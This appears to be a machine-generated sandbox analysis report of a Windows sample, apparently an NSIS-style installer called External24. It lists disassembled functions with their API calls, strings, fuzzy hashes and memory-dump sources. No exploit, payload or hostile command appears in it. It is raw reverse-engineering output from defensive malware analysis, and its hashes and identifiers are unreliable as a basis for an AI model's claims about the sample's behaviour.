lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
N, xrefs: 00404298
F, xrefs: 004042D3

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
plF, xrefs: 00406B54
^F, xrefs: 00406ACF
%s=%s, xrefs: 00406B6F
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: a6e159061596993274f255630f101908d443a7042a3caace086ef4ec63b593b2
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: a6e159061596993274f255630f101908d443a7042a3caace086ef4ec63b593b2
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 54e99e241c8afd660eab9bad30bcef99a83ce5c775448d5f605d6da5e564374f
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 54e99e241c8afd660eab9bad30bcef99a83ce5c775448d5f605d6da5e564374f
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042517C,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042517C,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
`G, xrefs: 0040246E
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: a1d34b4a194fa501c73bc2e3d6994ddde59c5835eda42f5b8646535a4474627c
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: a1d34b4a194fa501c73bc2e3d6994ddde59c5835eda42f5b8646535a4474627c
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00445D80,0042517C,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042517C,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042517C,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042517C,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 79f12f66bd64df0c608a5ab7b3ccf13f7e1581b7d89ee022cc616f7d195d7169
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 79f12f66bd64df0c608a5ab7b3ccf13f7e1581b7d89ee022cc616f7d195d7169
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
